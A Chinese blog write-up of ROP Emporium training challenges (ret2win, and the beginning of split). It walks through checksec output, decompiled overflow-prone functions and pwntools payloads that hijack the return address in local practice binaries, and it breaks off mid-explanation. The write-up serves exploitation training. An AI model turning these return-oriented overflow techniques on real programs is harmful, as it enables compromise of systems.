<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="bpww6NIyKNfozn7d3FvMSzrDS7_YpfeHmQhlR76xs0E">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.loli.net/css2?family=Noto+Serif+SC:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&family=Roboto+Mono:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.css" integrity="sha256-gkQVf8UKZgQ0HyuxL/VnacadJ+D2Kox2TCEBuNQg5+w=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"ex7l0it.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.22.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false,"trigger":"auto"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="ROP Emporium - ret2win, ret2syscall, ret2libc Writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="ROP Emporium - Challenge1-3 Writeup">
<meta property="og:url" content="https://ex7l0it.github.io/2022/03/07/ropemporium-wp-1/index.html">
<meta property="og:site_name" content="Blog">
<meta property="og:description" content="ROP Emporium - ret2win, ret2syscall, ret2libc Writeup">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307155836064.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/Pasted%20image%2020220818102948.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/Pasted%20image%2020220818103522.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307165702896.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307164132689.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307170816647.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307174011602.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307174539471.png">
<meta property="article:published_time" content="2022-03-07T07:51:00.000Z">
<meta property="article:modified_time" content="2023-11-19T16:00:00.000Z">
<meta property="article:author" content="Ex7l0it">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="writeup">
<meta property="article:tag" content="rop">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307155836064.png">


<link rel="canonical" href="https://ex7l0it.github.io/2022/03/07/ropemporium-wp-1/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ex7l0it.github.io/2022/03/07/ropemporium-wp-1/","path":"2022/03/07/ropemporium-wp-1/","title":"ROP Emporium - Challenge1-3 Writeup"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>ROP Emporium - Challenge1-3 Writeup | Blog</title>
  



  <script defer src='https://static.cloudflareinsights.com/beacon.min.js' data-cf-beacon='{&quot;token&quot;: &quot;796a8510575f44a696b7122ec8152063&quot;}'></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li><li class="menu-item menu-item-rss"><a href="/atom.xml" rel="section"><i class="fa fa-rss fa-fw"></i>RSS</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ROP-Emporium-Chanllenge1-3-Writeup"><span class="nav-number">1.</span> <span class="nav-text">ROP Emporium Chanllenge1-3 Writeup</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Challenge1-ret2win"><span class="nav-number">1.1.</span> <span class="nav-text">Challenge1 ret2win</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#x86-64"><span class="nav-number">1.1.1.</span> <span class="nav-text">x86_64</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90"><span class="nav-number">1.1.1.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF"><span class="nav-number">1.1.1.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload"><span class="nav-number">1.1.1.3.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#x86"><span class="nav-number">1.1.2.</span> <span class="nav-text">x86</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%86%E6%9E%90"><span class="nav-number">1.1.2.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF-1"><span class="nav-number">1.1.2.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-1"><span class="nav-number">1.1.2.3.</span> <span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Challenge2-split"><span class="nav-number">1.2.</span> <span class="nav-text">Challenge2 split</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#x86-64-1"><span class="nav-number">1.2.1.</span> <span class="nav-text">x86_64</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90-1"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF-2"><span class="nav-number">1.2.1.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-2"><span class="nav-number">1.2.1.3.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#x86-1"><span class="nav-number">1.2.2.</span> <span class="nav-text">x86</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90-2"><span class="nav-number">1.2.2.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF-3"><span class="nav-number">1.2.2.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-3"><span class="nav-number">1.2.2.3.</span> <span class="nav-text">payload</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Challenge3-callme"><span class="nav-number">1.3.</span> <span class="nav-text">Challenge3 callme</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#x86-64-2"><span class="nav-number">1.3.1.</span> <span class="nav-text">x86_64</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90-3"><span class="nav-number">1.3.1.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF-4"><span class="nav-number">1.3.1.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-4"><span class="nav-number">1.3.1.3.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#x86-2"><span class="nav-number">1.3.2.</span> <span class="nav-text">x86</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90-4"><span class="nav-number">1.3.2.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF-5"><span class="nav-number">1.3.2.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload-5"><span class="nav-number">1.3.2.3.</span> <span class="nav-text">payload</span></a></li></ol></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ex7l0it"
      src="https://avatars.githubusercontent.com/u/49543413">
  <p class="site-author-name" itemprop="name">Ex7l0it</p>
  <div class="site-description" itemprop="description">佛系更新</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/ex7l0it" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ex7l0it" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ex7l0it.github.io/2022/03/07/ropemporium-wp-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://avatars.githubusercontent.com/u/49543413">
      <meta itemprop="name" content="Ex7l0it">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog">
      <meta itemprop="description" content="佛系更新">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="ROP Emporium - Challenge1-3 Writeup | Blog">
      <meta itemprop="description" content="ROP Emporium - ret2win, ret2syscall, ret2libc Writeup">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ROP Emporium - Challenge1-3 Writeup<a href="https://github.com/ex7l0it/blog-source/tree/master/source/_posts/ropemporium-wp-1.md" class="post-edit-link" title="编辑" rel="noopener" target="_blank"><i class="fa fa-pen-nib"></i></a>
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-03-07 15:51:00" itemprop="dateCreated datePublished" datetime="2022-03-07T15:51:00+08:00">2022-03-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-11-20 00:00:00" itemprop="dateModified" datetime="2023-11-20T00:00:00+08:00">2023-11-20</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>2.1k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>8 分钟</span>
    </span>
</div>

            <div class="post-description">ROP Emporium - ret2win, ret2syscall, ret2libc Writeup</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="ROP-Emporium-Chanllenge1-3-Writeup"><a href="#ROP-Emporium-Chanllenge1-3-Writeup" class="headerlink" title="ROP Emporium Chanllenge1-3 Writeup"></a>ROP Emporium Chanllenge1-3 Writeup</h1><ul>
<li>仅做 x86_64 和 x86 的题目</li>
</ul>
<h2 id="Challenge1-ret2win"><a href="#Challenge1-ret2win" class="headerlink" title="Challenge1 ret2win"></a>Challenge1 ret2win</h2><p>题目说明及文件：<a target="_blank" rel="noopener" href="https://ropemporium.com/challenge/ret2win.html">https://ropemporium.com/challenge/ret2win.html</a></p>
<p>属于 ret2text，目的是控制程序执行它本身所拥有的代码（<code>.text</code>）获得 <code>flag</code></p>
<h3 id="x86-64"><a href="#x86-64" class="headerlink" title="x86_64"></a>x86_64</h3><h4 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h4><p>使用 checksec 检查开启的安全保护：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] &#x27;/home/ubuntu/Datas/rop-emporium/ret2win/ret2win&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>

<p>发现开启了 <code>NX</code> 和 <code>Partial RELRO</code></p>
<details class="note success"><summary><p><code>NX</code>、<code>Partial RELRO</code> 等是什么？</p>
</summary>
<ul>
<li><code>NX</code>：不可执行栈，即栈上的数据不可执行，防止栈溢出往栈上注入 shellcode 执行</li>
<li><code>RELRO</code>：全称 <code>Relocation Read-Only</code>，即只读重定位，防止 GOT 覆盖攻击<ul>
<li><code>Full RELRO</code>：所有重定位表都是只读的，包括 PLT 和 GOT</li>
<li><code>Partial RELRO</code>：只有 PLT 是只读的，GOT 是可写的</li>
<li><code>No RELRO</code>：所有重定位表都是可写的</li>
</ul>
</li>
</ul>

</details>

<p>再使用 Ghidra 反编译分析源码，容易找到存在栈溢出的函数 <code>pwnme()</code>：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">pwnme</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  undefined local_28 [<span class="number">32</span>];</span><br><span class="line">  </span><br><span class="line">  <span class="built_in">memset</span>(local_28,<span class="number">0</span>,<span class="number">0x20</span>);</span><br><span class="line">  <span class="built_in">puts</span>(</span><br><span class="line">      <span class="string">&quot;For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffe r!&quot;</span></span><br><span class="line">      );</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;What could possibly go wrong?&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(</span><br><span class="line">      <span class="string">&quot;You there, may I have your input please? And don\&#x27;t worry about null bytes, we\&#x27;re using read ()!\n&quot;</span></span><br><span class="line">      );</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;&gt; &quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>,local_28,<span class="number">56</span>);  <span class="comment">// 存在栈溢出</span></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Thank you!&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在程序中发现可以直接获取到 <code>flag</code> 的函数 <code>ret2win</code>：</p>
<p><img src="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307155836064.png" alt="image-20220307155836064"></p>
<h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><ol>
<li>没有Canary，直接通过栈溢出修改返回地址，让程序跳转执行 <code>ret2win</code> 函数</li>
<li>得到 flag</li>
</ol>
<p>当程序执行到 <code>pwnme</code> 函数的 <code>leave; ret</code> 时，可以看到此时栈的数据情况如下：</p>
<p><img src="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/Pasted%20image%2020220818102948.png" alt="Pasted image 20220818102948"></p>
<h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.update(arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;info&#x27;</span>)</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./ret2win&#x27;</span>)</span><br><span class="line">rop = ROP(elf)</span><br><span class="line">io = elf.process()</span><br><span class="line"></span><br><span class="line">payload = flat([</span><br><span class="line">    cyclic(<span class="number">32</span>),  <span class="comment"># 填充缓冲区</span></span><br><span class="line">    cyclic(<span class="number">8</span>),   <span class="comment"># fake rbp</span></span><br><span class="line">    p64(rop.ret.address), <span class="comment"># 加一个ret gadget</span></span><br><span class="line">    p64(elf.sym.ret2win)  <span class="comment"># ret address</span></span><br><span class="line">])</span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<details class="note success"><summary><p>为何要加一个 <code>ret gadget</code> ?</p>
</summary>
<p>　　在 <code>Ubuntu 18</code> 以上版本下执行 system 系统调用时需要栈对齐 <code>0x10</code>，不对齐时会导致程序崩溃退出，例如 这里的 system 函数；遇到无法正常利用的情况可以通过添加 <code>ret gadget</code> 让栈对齐。</p>
<p>不加 ret gadget 时会出现下面的 Segmentation fault:</p>
<p><img src="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/Pasted%20image%2020220818103522.png" alt="Pasted image 20220818103522"></p>
<p><code>movaps xmmword ptr [rsp + 0x50], xmm0</code> 这个指令会检查栈是否16字节对齐，对齐时 RSP 值末尾需要是 0 </p>

</details>


<div class="note info"><ul>
<li>符号表中存在目标函数名称时，在 <code>pwntools</code> 中可以直接通过 <code>elf.sym.函数名</code> 获取函数地址</li>
</ul>
</div>

<p>得到 flag：<code>ROPE&#123;a_placeholder_32byte_flag!&#125;</code></p>
<h3 id="x86"><a href="#x86" class="headerlink" title="x86"></a>x86</h3><h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><p>32 位程序的缓冲区大小略有不同：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">pwnme</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  undefined local_2c [<span class="number">40</span>];</span><br><span class="line">  </span><br><span class="line">  <span class="built_in">memset</span>(local_2c,<span class="number">0</span>,<span class="number">0x20</span>);</span><br><span class="line">  <span class="built_in">puts</span>(</span><br><span class="line">      <span class="string">&quot;For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffe r!&quot;</span></span><br><span class="line">      );</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;What could possibly go wrong?&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(</span><br><span class="line">      <span class="string">&quot;You there, may I have your input please? And don\&#x27;t worry about null bytes, we\&#x27;re using read ()!\n&quot;</span></span><br><span class="line">      );</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;&gt; &quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>,local_2c,<span class="number">56</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Thank you!&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="思路-1"><a href="#思路-1" class="headerlink" title="思路"></a>思路</h4><p>思路同上</p>
<h4 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h4><p>payload 稍加修改：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload = flat([</span><br><span class="line">    cyclic(<span class="number">40</span>),           <span class="comment"># buffer</span></span><br><span class="line">    cyclic(<span class="number">4</span>),            <span class="comment"># fake esp</span></span><br><span class="line">    p32(elf.sym.ret2win)  <span class="comment"># return address</span></span><br><span class="line">])</span><br></pre></td></tr></table></figure>

<p>得到 flag：<code>ROPE&#123;a_placeholder_32byte_flag!&#125;</code></p>
<h2 id="Challenge2-split"><a href="#Challenge2-split" class="headerlink" title="Challenge2 split"></a>Challenge2 split</h2><p>题目说明及文件: <a target="_blank" rel="noopener" href="https://ropemporium.com/challenge/split.html">https://ropemporium.com/challenge/split.html</a></p>
<h3 id="x86-64-1"><a href="#x86-64-1" class="headerlink" title="x86_64"></a>x86_64</h3><h4 id="程序分析-1"><a href="#程序分析-1" class="headerlink" title="程序分析"></a>程序分析</h4><p>检查开启的安全保护：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] &#x27;/home/ubuntu/Datas/rop-emporium/split/split&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>

<p>发现开启了 NX 和 Partial RELRO</p>
<p>再反编译分析源码，同样容易找到存在栈溢出的函数 pwnme()：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">pwnme</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  undefined local_28 [<span class="number">32</span>];</span><br><span class="line">  </span><br><span class="line">  <span class="built_in">memset</span>(local_28,<span class="number">0</span>,<span class="number">0x20</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Contriving a reason to ask user for data...&quot;</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;&gt; &quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>,local_28,<span class="number">0x60</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Thank you!&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这一次没有了可以直接获取 flag 的函数，但是在 <code>.got.plt</code> 表中发现有 system 函数：</p>
<img src="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307165702896.png" alt="image-20220307165702896" style="zoom:50%;" />

<details class="note success"><summary><p><code>.got.plt</code> 是什么?</p>
</summary>
<p><a target="_blank" rel="noopener" href="https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html">.got.plt</a>: This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the <code>.plt</code> to trigger the lookup. Classically, this data was part of the <code>.got</code> section.</p>
<ul>
<li>相当于是 <code>.plt</code> 的 GOT 全局偏移表<ul>
<li>当目标函数查找过时，其中存储有函数的具体地址</li>
